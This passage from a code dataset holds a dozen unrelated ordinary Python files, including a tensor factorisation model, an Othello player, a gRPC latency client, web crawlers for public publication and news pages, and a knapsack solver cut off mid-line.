stats_period == SENTRY_STAT_PERIOD_DAY else 12\n\n current_count = sum([occurrences[t][1] for t in range(latest_index - period_length, latest_index)])\n old_count = sum([\n occurrences[t][1] for t in range(latest_index - 2 * period_length, latest_index - period_length)\n ])\n\n ratio = current_count / old_count if old_count != 0 else None\n\n if ratio is None:\n level = 0 if current_count == 0 else 2\n elif ratio >= 2 * threshold:\n level = 2\n elif ratio >= threshold:\n level = 1\n else:\n level = 0\n\n return level, ratio, current_count\n","sub_path":"src/curtis/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"377920332","text":"import numpy as np\nimport tqdm\ntry:\n from opt_einsum import contract as einsum\nexcept ImportError:\n from numpy import einsum\n\n\ndef hat(P, At, Ac, eps=None):\n if eps is None:\n eps = np.finfo(float).eps\n\n return eps + einsum('abfj,tj,cj->abftc', P, At, Ac)\n\n\ndef nnrandn(shape):\n \"\"\"generates randomly a nonnegative ndarray of given shape\n\n Parameters\n ----------\n shape : tuple\n The shape\n\n Returns\n -------\n out : array of given shape\n The non-negative random numbers\n \"\"\"\n return np.abs(np.random.randn(*shape))\n\n\nclass CFM(object):\n \"\"\"The Common Fate model\n 
Vj(a,b,f,t,c) = P(a,b,f,j)At(t,j)Ac(c,j)\n\n    So we have one modulation texture \"shape\" for each frequency,\n    hence P(a,b,f,j) which is activated over time, this is At(t,j) and over\n    channels, this is Ac(c,j)\n\n    Parameters\n    ----------\n    data : ndarray\n        The data to approximate\n    nb_components : int > 0\n        the number of latent components for the NTF model\n        positive integer\n    beta : float\n        The beta-divergence to use. An arbitrary float, but note\n        that non-small integer values will significantly slow the\n        calculation down. Particular cases of interest are:\n\n        * beta=2 : Euclidean distance\n        * beta=1 : Kullback Leibler\n        * beta=0 : Itakura-Saito\n    \"\"\"\n    def __init__(\n        self,\n        data,\n        nb_components,\n        nb_iter=100,\n        beta=1,\n        P=None,\n        At=None,\n        Ac=None,\n    ):\n        # General fitting parameters\n        self.data = data\n        self.nb_components = nb_components\n        self.beta = float(beta)\n        self.nb_iter = nb_iter\n\n        # Factorisation Parameters\n        if P is None:\n            self.P = nnrandn(self.data.shape[:3] + (nb_components,))\n        else:\n            self.P = P\n\n        if At is None:\n            self.At = nnrandn((self.data.shape[3], nb_components))\n        else:\n            self.At = At\n\n        if Ac is None:\n            self.Ac = nnrandn((self.data.shape[4], nb_components))\n        else:\n            self.Ac = Ac\n\n    def fit(self):\n        \"\"\"fits a common fate model to\n        Z(a,b,f,t,c) = P(a,b,f,j)At(t,j)Ac(c,j)\n        \"\"\"\n\n        def MU(einsumString, Z, factors):\n            Zhat = hat(self.P, self.At, self.Ac)\n            return (\n                einsum(\n                    einsumString,\n                    self.data * (Zhat ** (self.beta - 2)),\n                    *factors) /\n                einsum(\n                    einsumString,\n                    Zhat ** (self.beta - 1),\n                    *factors\n                )\n            )\n\n        for it in tqdm.tqdm(range(self.nb_iter)):\n            self.P *= MU('abftc,tj,cj->abfj', self.data, (self.At, self.Ac))\n            self.At *= MU('abftc,abfj,cj->tj', self.data, (self.P, self.Ac))\n            self.Ac *= MU('abftc,abfj,tj->cj', self.data, (self.P, self.At))\n\n        return self\n\n    @property\n    def factors(self):\n        return (self.P, self.At, self.Ac)\n\n    @property\n    def approx(self):\n        return hat(self.P, self.At, self.Ac)\n","sub_path":"pycfm/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"188268238","text":"# Author: Marianela Contreras Domínguez, A01374769\n# Description: Problem to calculate the percentage of men and women in a class. 
\n\n# Write your program after this line.\n\nmujeres = float(input(\"Women enrolled:\"))\n\nhombres = float(input(\"Men enrolled:\"))\n\ntotal = int(mujeres + hombres)\nporcentajeMujeres = (mujeres*100)/total\nporcentajeHombres = (hombres*100)/total\n\nprint (\"Total students enrolled:\",(total))\nprint (\"Percentage of women: %.1f\"% (porcentajeMujeres),\"%\")\nprint (\"Percentage of men: %.1f\" % (porcentajeHombres),\"%\")\n\n","sub_path":"clase.py","file_name":"clase.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"475038456","text":"# -*- coding: utf-8 -*- \r\n\r\n# Project: Shibor System\r\n# Description: download shibor data in a fixed format\r\n# Module:\r\n# Copyright: Copyright (c) 2013\r\n# Company: Olive Software\r\n# @author Richard\r\n# @version 0.1\r\n#\r\n#*************************************************************\r\n# Create: 2013-11-11\r\n#*************************************************************\r\n# Modified History\r\n#\r\n\r\nimport sys\r\nimport os\r\nimport datetime\r\nimport time\r\nimport re\r\nimport urllib.request\r\nimport logging \r\nfrom olive.finance import spider,database\r\n\r\n\r\n\r\nlogging.basicConfig(filename = os.path.join(os.getcwd()+'/log', 'shibor_log{0}.txt'.format(time.strftime('%Y%m%d',time.gmtime()))),level = logging.INFO, filemode = 'w', format = '%(asctime)s - %(levelname)s : %(message)s') \r\n\r\n# connect to the database\r\nmydb=database.oliveMongoDB()\r\n\r\n# fetch the data\r\n\r\nyear=int(datetime.date.today().year)\r\nmonth=int(datetime.date.today().month)\r\n\r\nif len(sys.argv) > 2:\r\n\tyear=int(sys.argv[1])\r\n\tmonth=int(sys.argv[2])\r\n\r\ndatalist=[]\r\n\r\nif month!=-1:\r\n\tdatalist=spider.getShiborData(year,month)\r\n\r\nelse:\r\n\tdatalist=spider.getShiborData(year)\r\n\r\nmessage='failed to get datalist!'\r\n\r\nif datalist is None:\r\n\tlogging.error(message)\r\nelse:\r\n\tfor row in datalist:\r\n\t\tif mydb.updateData('shibor',{\"Date\":row[\"Date\"]},row,True):\r\n\t\t\tmessage='{0} data update is Ok!'.format(row[\"Date\"])\r\n\t\t\tlogging.info(message)\r\n\t\telse:\r\n\t\t\tmessage='{0} data update is Error!'.format(row[\"Date\"])\r\n\t\t\tlogging.error(message)\r\n\t\tprint(message)\r\n\t\r\n\tmessage='{0} records processed!'.format(len(datalist))\r\n\r\nprint('{0}\\r\\n{1}\\r\\n{2}'.format('='*80,message,'='*80))\r\n\r\nmydb.close()\r\n","sub_path":"get_shibor.py","file_name":"get_shibor.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"237822212","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2014 Harvard\n#\n# Authors:\n#    Xavier Antoviaque \n#\n# This software's license gives you freedom; you can copy, convey,\n# propagate, redistribute and/or modify this program under the terms of\n# the GNU Affero General Public License (AGPL) as published by the Free\n# Software Foundation (FSF), either version 3 of the License, or (at your\n# option) any later version of the AGPL published by the FSF.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU Affero\n# General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program in a file in the toplevel directory called\n# \"AGPLv3\". 
If not, see <http://www.gnu.org/licenses/>.\n#\n\n# Imports ###########################################################\n\nimport logging\nimport os\nimport pkg_resources\n\nfrom django.template import Context, Template\nfrom xblock.fragment import Fragment\n\n\n# Globals ###########################################################\n\nlog = logging.getLogger(__name__)\n\n\n# Functions #########################################################\n\ndef load_resource(resource_path):\n    \"\"\"\n    Gets the content of a resource\n    \"\"\"\n    resource_content = pkg_resources.resource_string(__name__, resource_path)\n    return unicode(resource_content)\n\ndef render_template(template_path, context={}):\n    \"\"\"\n    Evaluate a template by resource path, applying the provided context\n    \"\"\"\n    template_str = load_resource(template_path)\n    template = Template(template_str)\n    return template.render(Context(context))\n\ndef get_scenarios_from_path(scenarios_path, include_identifier=False):\n    \"\"\"\n    Returns an array of (title, xmlcontent) from files contained in a specified directory,\n    formatted as expected for the return value of the workbench_scenarios() method\n    \"\"\"\n    base_fullpath = os.path.dirname(os.path.realpath(__file__))\n    scenarios_fullpath = os.path.join(base_fullpath, scenarios_path)\n\n    scenarios = []\n    if os.path.isdir(scenarios_fullpath):\n        for template in os.listdir(scenarios_fullpath):\n            if not template.endswith('.xml'):\n                continue\n            identifier = template[:-4]\n            title = identifier.replace('_', ' ').title()\n            template_path = os.path.join(scenarios_path, template)\n            if not include_identifier:\n                scenarios.append((title, load_resource(template_path)))\n            else:\n                scenarios.append((identifier, title, load_resource(template_path)))\n\n    return scenarios\n\ndef load_scenarios_from_path(scenarios_path):\n    \"\"\"\n    Load all xml files contained in a specified directory, as workbench scenarios\n    \"\"\"\n    return get_scenarios_from_path(scenarios_path, include_identifier=True)\n\n\n# Classes ###########################################################\n\nclass XBlockWithChildrenFragmentsMixin(object):\n    def get_children_fragment(self, context, view_name='student_view', instance_of=None,\n                              not_instance_of=None):\n        \"\"\"\n        Returns a global fragment containing the resources used by the children views,\n        and a list of fragments, one per children\n        - `view_name` allows to select a specific view method on the children\n        - `instance_of` allows to only return fragments for children which are instances of \n          the provided class\n        - `not_instance_of` allows to only return fragments for children which are *NOT* \n          instances of the provided class\n        \"\"\"\n        fragment = Fragment()\n        named_child_frags = []\n        for child_id in self.children:  # pylint: disable=E1101\n            child = self.runtime.get_block(child_id)\n            if instance_of is not None and not isinstance(child, instance_of):\n                continue\n            if not_instance_of is not None and isinstance(child, not_instance_of):\n                continue\n            frag = self.runtime.render_child(child, view_name, context)\n            fragment.add_frag_resources(frag)\n            named_child_frags.append((child.name, frag))\n        return fragment, named_child_frags\n\n    def children_view(self, context, view_name='children_view'):\n        \"\"\"\n        Returns a fragment with the content of all the children's content, concatenated\n        \"\"\"\n        fragment, named_children = self.get_children_fragment(context)\n        for name, child_fragment in named_children:\n            fragment.add_content(child_fragment.content)\n        return 
fragment\n","sub_path":"fbmxvideoquiz/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"484676950","text":"import logging, grpc, time\r\nimport numpy as np\r\n\r\nimport server_tools_pb2\r\nimport server_tools_pb2_grpc\r\n\r\nfrom matplotlib import pyplot as plt\r\n\r\nPORT = '50051'\r\nf = open(\"IP.txt\")\r\nIP = f.read()\r\nif IP[-1] == '\\n':\r\n IP = IP[:-1]\r\nf.close()\r\n\r\ndef run(wait, num_images):\r\n # Get a handle to the server\r\n channel = grpc.insecure_channel(IP + ':' + PORT)\r\n stub = server_tools_pb2_grpc.MnistServerStub(channel)\r\n\r\n # Get a client ID which you need to talk to the server\r\n try:\r\n response = stub.RequestClientID(server_tools_pb2.NullParam())\r\n except:\r\n print(\"Connection to the server could not be established. Press enter to try again.\")\r\n return\r\n client_id = response.new_id\r\n\r\n # Generate lots of data\r\n data = np.random.rand(num_images, 28, 28, 1)\r\n data = data.tostring()\r\n\r\n # Send the data to the server and receive an answer\r\n start_time = time.time()\r\n if wait:\r\n response = stub.StartJobWait(server_tools_pb2.DataMessage(images=data, client_id=client_id, batch_size=32))\r\n else:\r\n idPackage = stub.StartJobNoWait(server_tools_pb2.DataMessage(images=data, client_id=client_id, batch_size=32))\r\n response = stub.ProbeJob(idPackage)\r\n while not response.complete:\r\n response = stub.ProbeJob(idPackage)\r\n if response.error != '':\r\n print(response.error)\r\n break\r\n\r\n # Print output\r\n original_array = np.frombuffer(response.prediction).reshape(num_images, 10)\r\n whole_time = time.time() - start_time\r\n fraction_not_predicting = (1 - response.infer_time / whole_time)\r\n channel.close()\r\n return whole_time, fraction_not_predicting / num_images\r\n\r\n\r\nif __name__ == '__main__':\r\n logging.basicConfig()\r\n wait = True\r\n image_number = list(range(1, 10))+list(range(10, 100, 10))\r\n wait_whole_times = []\r\n wait_fraction = []\r\n no_wait_whole_times = []\r\n no_wait_fraction = []\r\n print(\"WAITING\")\r\n for num_images in image_number:\r\n print(num_images)\r\n whole_time, fraction = run(True, num_images)\r\n wait_whole_times.append(whole_time)\r\n wait_fraction.append(fraction)\r\n print(\"NOT WAITING\")\r\n for num_images in image_number:\r\n print(num_images)\r\n whole_time, fraction = run(False, num_images)\r\n no_wait_whole_times.append(whole_time)\r\n no_wait_fraction.append(fraction)\r\n\r\n while True:\r\n i = input()\r\n if i == '':\r\n break\r\n plt.scatter(image_number, wait_fraction, c='r', marker='o', alpha=0.5)\r\n plt.scatter(image_number, no_wait_fraction, c='b', marker='s', alpha=0.5)\r\n plt.legend(['Wait for server to respond', 'Periodically check in with server'])\r\n plt.xlabel('Images sent')\r\n plt.xscale('log')\r\n plt.axis([1, 100, 0, float(i)])\r\n plt.ylabel('Fraction time spent not predicting per image')\r\n plt.show()\r\n\r\n while True:\r\n i = input()\r\n if i == '':\r\n break\r\n plt.scatter(image_number, wait_whole_times, c='r', marker='o', alpha=0.5)\r\n plt.scatter(image_number, no_wait_whole_times, c='b', marker='s', alpha=0.5)\r\n plt.legend(['Wait for server to respond', 'Periodically check in with server'])\r\n plt.xlabel('Images sent')\r\n plt.xscale('log')\r\n plt.axis([1, 100, 0, float(i)])\r\n plt.ylabel('Total wait time (s)')\r\n 
plt.show()\r\n","sub_path":"client-get-latency.py","file_name":"client-get-latency.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"282947148","text":"def GBM_FAST(mu, dt, time, So, n_lines, vol):\r\n #mu = .05\r\n #dt = (1/252)\r\n\r\n n = int(252 * time)\r\n #So = 50\r\n #n_lines = 10000\r\n\r\n #K = 60\r\n #H = 55\r\n sigma = np.array([vol]*n_lines)\r\n\r\n S = np.exp( (mu - sigma ** 2 / 2) * dt + sigma * np.random.normal(0, np.sqrt(dt), size=(len(sigma), n)).T )\r\n S = np.vstack([np.ones(len(sigma)), S])\r\n S = So * S.cumprod(axis=0)\r\n return(S)\r\n\r\n\r\n# Step 1. Generate Terminal Stock Price \r\nS = GBM_FAST(mu, dt, time, So, n_lines, vol)\r\n\r\nn_row, n_col = S.shape\r\nterminal_prices = (S[(n_row-1)][:])\r\nl = len(terminal_prices)\r\n\r\n\r\n# Step 2. Apply the unbiased estimator\r\noption_payoff = np.where(terminal_prices < K , (K-terminal_prices), 0.0 )\r\noption_payoff = option_payoff * np_prob(vol, time, H, So, terminal_prices) \r\n\r\nprice = np.power(np.average(option_payoff) , np.exp(-r*time))\r\nprint(price)\r\n\r\n\r\n\r\nwith plt.style.context('science'):\r\n fig, ax = plt.subplots(figsize=(3.75,3.25))\r\n ax.get_xaxis().set_major_formatter(matplotlib.ticker.FuncFormatter(lambda x, p: format(int(x), ',')))\r\n\r\n ax.yaxis.labelpad = 27\r\n plt.plot(time_steps, prices)\r\n\r\n plt.ylabel('Option \\n Price $(\\$)$', rotation = 'horizontal', fontsize = 14)\r\n plt.xlabel('Number of Monte Carlo Simulations', fontsize = 14)\r\n plt.title('Up-and-Out Put Option (UOP)', fontsize = 14)\r\n #plt.tight_layout()\r\n #plt.xlim(2000, np.max(time_steps))\r\n plt.savefig('plots/UOP_MC_500.jpg', dpi = 450)\r\n plt.show()\r\n\r\n\r\n\r\n","sub_path":"general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"34403761","text":"class ClaudiaEduardo_GulosoPlayer:\r\n def __init__(self, color):\r\n self.color = color\r\n\r\n def play(self, board):\r\n return self.pegaMaiorCaminho(board.valid_moves(self.color), board)\r\n \r\n \r\n # estrategia que escolhe de forma gulosa a jogada que \"come\" mais pecas do inimigo\r\n def pegaMaiorCaminho(self, moves, board):\r\n from models.board import Board\r\n import random\r\n from models.move import Move\r\n \r\n melhorDist = 0\r\n melhorMov = None\r\n \r\n distancias = {}\r\n \r\n # para cada jogava possivel, ver quantas pecas do inimigo sao comidas e pega a maior\r\n for move in moves:\r\n dist_total = 0\r\n \r\n # para cada jogada possivel, vamos olhar em todas as direcoes pra calcular o\r\n # quanto sera comido no total\r\n for direction in Board.DIRECTIONS:\r\n posicao = [move.x + direction[0], move.y + direction[1]]\r\n inimigo = Board.BLACK if self.color == Board.WHITE else Board.WHITE\r\n dist = 0\r\n \r\n casa_sendo_vista = board.get_square_color(posicao[0],posicao[1])\r\n \r\n # soma 1 a distancia se estamos num caminho valido (casas do inimigo no meio da \"linha\")\r\n while casa_sendo_vista == inimigo:\r\n posicao = [posicao[0] + direction[0], posicao[1] + direction[1]]\r\n casa_sendo_vista = board.get_square_color(posicao[0],posicao[1])\r\n dist = dist + 1\r\n \r\n # se o caminho termina com uma casa minha, sera valido (comecou com a casa vazia onde jogaremos)\r\n if casa_sendo_vista == self.color:\r\n dist_total = dist_total + dist\r\n \r\n # verifica se vamos \"comer\" mais com essa jogada\r\n if dist_total > 
melhorDist:\r\n                melhorDist = dist_total\r\n                melhorMov = move\r\n            \r\n            distancias[(move.x, move.y)] = dist_total\r\n        \r\n        \r\n        # randomly pick among the best moves in case of a tie\r\n        melhores = []\r\n        for casa, dist in distancias.items():\r\n        \tif dist == melhorDist:\r\n        \t\tmelhores.append(Move(casa[0], casa[1]))\r\n        \r\n        \r\n        return random.choice(melhores)\r\n    \r\n","sub_path":"models/players/claudia_eduardo_guloso_player.py","file_name":"claudia_eduardo_guloso_player.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"296272102","text":"import bs4\nimport re\nimport os\nimport requests\nimport json\nimport datetime\nfrom typing import Iterable\nimport itertools\nfrom dataPipelines.gc_crawler.requestors import MapBasedPseudoRequestor\nfrom dataPipelines.gc_crawler.exec_model import Crawler, Parser, Pager\nfrom dataPipelines.gc_crawler.data_model import Document, DownloadableItem\nfrom dataPipelines.gc_crawler.utils import abs_url\n\nfrom . import SOURCE_SAMPLE_DIR, BASE_SOURCE_URL\n\ndef remove_html_tags(text):\n    import re\n    clean=re.compile('<.*?>')\n    return re.sub(clean,'',text)\n\nclass ArmyReservePager(Pager):\n    \"\"\"Pager for ArmyReserve Issuance crawler\"\"\"\n\n    def iter_page_links(self) -> Iterable[str]:\n        \"\"\"Iterator for page links\"\"\"\n        url = 'https://www.usar.army.mil/Publications/'\n\n        yield url\n\n\nclass ArmyReserveParser(Parser):\n    \"\"\"Parser for ArmyReserve Issuance crawler\"\"\"\n\n    def parse_docs_from_page(self, page_url: str, page_text: str) -> Iterable[Document]:\n        \"\"\"Parse document objects from page of text\"\"\"\n\n        # parse html response\n        page2 = requests.get(page_url)\n        soup2 = bs4.BeautifulSoup(page2.content, 'html.parser')\n        doc_num = []\n        pdf = []\n        doc_title = []\n        datelist = []\n        doctype = []\n        parsed_docs = []\n        webpart2 = soup2.find(\"div\", {\"class\": \"skin-pane2 col-md-8\"})\n        meta = webpart2.find_all(\"div\")\n        for row in meta:\n            if ((remove_html_tags((str(row))).isspace()) or not remove_html_tags((str(row)))):\n                continue\n            for cell in row.find_all('p'):\n                # print(cell.find(\"strong\"))\n                words = ''\n                links = cell.find_all(\"a\")\n                link_list = list(links)\n                # print(links)\n                nums = []\n                pdf_links = [link['href'] for link in link_list if \"pdf\" in link['href'] or \"aspx\" in link['href']]\n                if not pdf_links:\n                    continue\n                pdf.append(str(pdf_links[0]))\n                # print(pdf_links)\n                words = remove_html_tags((str(cell.find(\"strong\")))).encode('ascii', 'ignore').decode('ascii').lstrip(\n                    \" \").rstrip(\" \")\n                words = \" \".join(words.split())\n                # print(words)\n                # else:\n                # print(cell)\n                doc_num.append(words)\n                pdf.append(str(pdf_links[0]))\n                title = [text for text in cell.find_all(text=True) if text.parent.name != \"strong\"]\n                doc_title.append(title)\n        pub_links = []\n        [pub_links.append(x) for x in pdf if x not in pub_links]\n        document_name = []\n        [document_name.append(x) for x in doc_num if x not in document_name]\n        document_type = []\n        [document_type.append(' '.join(x.split()[0:2])) for x in document_name]\n        document_number = []\n        [document_number.append(' '.join(x.split()[2:])) for x in document_name]\n        document_title = []\n        [document_title.append(x) for x in doc_title if x not in document_title]\n        document_title = [item for sublist in document_title for item in sublist]\n        document_title = [str(item).encode('ascii', 'ignore').decode('ascii').lstrip(\" \").rstrip(\" \") for item in\n                          document_title]\n        final = 
list(itertools.zip_longest(document_type, document_number, document_title, pub_links))\n final = [list(x) for x in final]\n for item in final:\n doc_name = item[0]+' '+item[1]\n if (item[2] is None):\n doc_title=\"\"\n else:\n doc_title = item[2]\n doc_num = item[1]\n doc_type = item[0]\n publication_date = \"N/A\"\n if item[3].startswith(\"https\"):\n cac_login_required=True\n url = item[3]\n url = url.replace(\" \",\"%20\")\n else:\n cac_login_required=False\n url = \"https://www.usar.army.mil\"+item[3]\n url = url.replace(\" \",\"%20\")\n pdf_di = DownloadableItem(doc_type='pdf', web_url=url)\n version_hash_fields = {\n \"item_currency\": str(url).split('/')[-1], # version metadata found on pdf links\n \"document_title\": doc_title.strip(),\n \"document_number\": doc_num.strip()\n }\n if (str(doc_type).startswith(\"USAR\") == False):\n doc_title = doc_name\n doc_num = \"\"\n doc_type = \"USAR Doc\"\n version_hash_fields = {\n \"item_currency\": str(url).split('/')[-1], # version metadata found on pdf links\n \"document_title\": doc_title.strip(),\n \"document_number\": doc_num.strip()}\n\n doc = Document(\n doc_name=doc_name.strip(),\n doc_title=re.sub('\\\\\"', '', doc_title),\n doc_num=doc_num.strip(),\n doc_type=doc_type.strip(),\n publication_date=publication_date,\n cac_login_required=cac_login_required,\n crawler_used=\"Army_Reserve\",\n source_page_url=page_url.strip(),\n version_hash_raw_data=version_hash_fields,\n downloadable_items=[pdf_di]\n )\n\n parsed_docs.append(doc)\n return parsed_docs\n\n\nclass ArmyReserveCrawler(Crawler):\n \"\"\"Crawler for the example web scraper\"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(\n *args,\n **kwargs,\n pager=ArmyReservePager(\n starting_url=BASE_SOURCE_URL\n ),\n parser=ArmyReserveParser()\n )\n\n\nclass FakeArmyReserveCrawler(Crawler):\n \"\"\"Army Reserve crawler that just uses stubs and local source files\"\"\"\n def __init__(self, *args, **kwargs):\n with open(os.path.join(SOURCE_SAMPLE_DIR, 'ArmyReserve.html')) as f:\n default_text = f.read()\n\n super().__init__(\n *args,\n **kwargs,\n pager=ArmyReservePager(\n requestor=MapBasedPseudoRequestor(\n default_text=default_text\n ),\n starting_url=BASE_SOURCE_URL\n ),\n parser=ArmyReserveParser()\n )\n","sub_path":"dataPipelines/gc_crawler/army_reserves/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"63970380","text":"import logging\nfrom bs4 import BeautifulSoup\nfrom Utils.Utils import WebSite\nfrom spider.baseSiteParser import BaseNewsParser, ScpNewsParser\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass RmltParser(BaseNewsParser):\n\n def __init__(self):\n self.domain = 'rmlt.com.cn'\n self.Scp = ScpNewsParser()\n\n def parser(self, url):\n logger.info(url)\n content = WebSite.web_fetch2(url, decode='utf-8')\n soup = BeautifulSoup(content, 'lxml')\n fgxnews = soup.find_all('li', class_='fgxnews')\n for tree in fgxnews:\n tag = tree.find('a', target='_blank', title=True)\n title = tag.get('title')\n url = tag.get('href')\n seg = self.Scp.Begin()\n seg.set_title(title) \\\n .set_url(url) \\\n .End()\n\n def get_result(self):\n return self.Scp.get_params()\n","sub_path":"spider/news/rmlt.py","file_name":"rmlt.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"557097434","text":"from class_model.dataset import DataSet\nimport 
class_model.mathutil as mu\nimport class_model.dataset_mode as dm\nimport os\nimport numpy as np\nfrom class_model.dataset_mode import Select\n\n\n# noinspection PyCallByClass\nclass Office31Dataset(DataSet):\n def __init__(self, resolution=[100, 100], input_shape=[-1]):\n\n super(Office31Dataset, self).__init__('office31', 'dual_select')\n\n path = '../data/domain_adaptation_images'\n domain_names = mu.list_dir(path)\n\n images = []\n didxs, oidxs = [], []\n object_names = None\n\n for dx, dname in enumerate(domain_names):\n domainpath = os.path.join(path, dname, 'images')\n object_names = mu.list_dir(domainpath)\n\n for ox, oname in enumerate(object_names):\n objectpath = os.path.join(domainpath, oname)\n filenames = mu.list_dir(objectpath)\n for fname in filenames:\n if fname[-4:] != '.jpg':\n continue\n imagepath = os.path.join(objectpath, fname)\n pixels = mu.load_image_pixels(imagepath, resolution, input_shape)\n images.append(pixels)\n didxs.append(dx)\n oidxs.append(ox)\n self.image_shape = resolution + [3]\n\n xs = np.asarray(images, np.float32) # shape(4110, 30000)\n\n ys0 = mu.onehot(didxs, len(domain_names)) # ys0.shape(4110, 3)\n ys1 = mu.onehot(oidxs, len(object_names)) # ys1.shape(4110, 31)\n ys = np.hstack([ys0, ys1]) # ys.shape(4110, 34)\n\n self.dataset_shuffle_data(xs, ys, 0.8)\n self.target_names = [domain_names, object_names]\n self.cnts = [len(domain_names)]\n\n def dataset_forward_postproc(self, output, y):\n # print(\"office dataset_forward_postproc\")\n outputs, ys = np.hsplit(output, self.cnts), np.hsplit(y, self.cnts)\n\n loss0, aux0 = Select.dataset_forward_postproc(self, outputs[0], ys[0])\n loss1, aux1 = Select.dataset_forward_postproc(self, outputs[1], ys[1])\n # print(f\"loss0{loss0} \\n loss1 {loss1}\")\n return loss0 + loss1, [aux0, aux1]\n\n def dataset_backprop_postproc(self, G_loss, aux):\n # print(\"office dataset_backprop_postproc\")\n aux0, aux1 = aux\n\n G_output0 = Select.dataset_backprop_postproc(self, G_loss, aux0) # G_output0 (10, 3)\n G_output1 = Select.dataset_backprop_postproc(self, G_loss, aux1) # G_output1 (10, 31)\n # print(f\"G_output {G_output0.shape}, {G_output1.shape}\")\n\n return np.hstack([G_output0, G_output1])\n\n def dataset_eval_accuracy(self, x, y, output):\n # print(\"office dataset_eval_accuracy\")\n outputs, ys = np.hsplit(output, self.cnts), np.hsplit(y, self.cnts)\n\n acc0 = Select.dataset_eval_accuracy(self, x, ys[0], outputs[0])\n acc1 = Select.dataset_eval_accuracy(self, x, ys[1], outputs[1])\n\n return [acc0, acc1]\n\n def dataset_train_prt_result(self, epoch, costs, accs, acc, time1, time2):\n # print(\"office dataset_train_prt_result\")\n acc_pair = np.mean(accs, axis=0)\n print(' Epoch {}: cost={:5.3f}, accuracy={:5.3f}+{:5.3f}/{:5.3f}+{:5.3f} ({}/{} secs)'.format(epoch,\n np.mean(costs),\n acc_pair[0],\n acc_pair[1],\n acc[0], acc[1],\n time1,\n time2))\n\n def dataset_test_prt_result(self, name, acc, time):\n # print(\"office dataset_test_prt_result\")\n\n print('Model {} test report: accuracy = {:5.3f}+{:5.3f}, ({} secs)\\n'.format(name, acc[0], acc[1], time))\n\n def dataset_get_estimate(self, output):\n # print(\"office get_estimate\")\n outputs = np.hsplit(output, self.cnts)\n\n estimate0 = Select.dataset_get_estimate(self, outputs[0])\n estimate1 = Select.dataset_get_estimate(self, outputs[1])\n\n return np.hstack([estimate0, estimate1])\n\n def visualize(self, xs, estimates, answers):\n\n print(\" office visualize \")\n # print(f\"estimates{estimates}\\n{answers}\")\n mu.draw_images_horz(xs, 
self.image_shape)\n        # print(f\"estimates type {type(estimates)} shape {estimates.shape}\")\n        ests, anss = np.hsplit(estimates, self.cnts), np.hsplit(answers, self.cnts)\n\n        captions = ['domain', 'product']\n        # print(f\"self.target_names,{len(self.target_names[0])},\\n,{len(self.target_names[1])}\")\n        for m in range(2):\n            print('[ {} estimation results ]'.format(captions[m]))\n            print(f\"ests[{m}]{ests[m].shape}\")\n            mu.show_select_results(ests[m], anss[m], self.target_names[m], 8)\n","sub_path":"ADAM/dataset_office31.py","file_name":"dataset_office31.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"238492726","text":"import pygame\n\nclass Ship(object):\n\t\"\"\"doc string for Ship\"\"\"\n\tdef __init__(self,setting,screen):\n\t\tself.screen = screen\n\t\tself.setting = setting\n\n\t\t# load the image and get its bounding rect\n\t\tself.image = pygame.image.load('images/rock.png')\n\t\tself.image_rect = self.image.get_rect()\n\t\tself.screen_rect = screen.get_rect()\n\n\t\t# place the rect\n\t\tself.image_rect.centerx = self.screen_rect.centerx\n\t\tself.image_rect.bottom = self.screen_rect.bottom\n\n\t\t# \n\t\tself.center = float(self.image_rect.centerx)\n\n\t\t#\n\t\tself.moving_right = False\n\t\tself.moving_left = False\n\n\tdef blitme(self):\n\t\t\"\"\" draw the ship at the specified position \"\"\"\n\t\tself.screen.blit(self.image,self.image_rect)\n\n\tdef update(self):\n\t\tif self.moving_right and self.image_rect.right < self.screen_rect.right:\n\t\t\tself.center += self.setting.ship_speed_facter\n\t\tif self.moving_left and self.image_rect.left > 0 :\n\t\t\tself.center -= self.setting.ship_speed_facter \n\n\t\t# update the rect object from self.center\n\t\tself.image_rect.centerx = self.center","sub_path":"Game/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"146177615","text":"def solve(n,W,arr,ind): \n    dp = [[0 for i in range(W+1)] for j in range(n+1)]\n    for i in range(1,n+1):\n        for j in range(1,W+1):\n            if arr[i-1] <= j:\n                dp[i][j] = max(ind[i-1] + dp[i-1][j-arr[i-1]], dp[i-1][j])\n            else:\n                dp[i][j] = dp[i-1][j]\n    return dp[n][W]\n\nt = int(input())\nwhile t > 0:\n    n = int(input())\n    W = 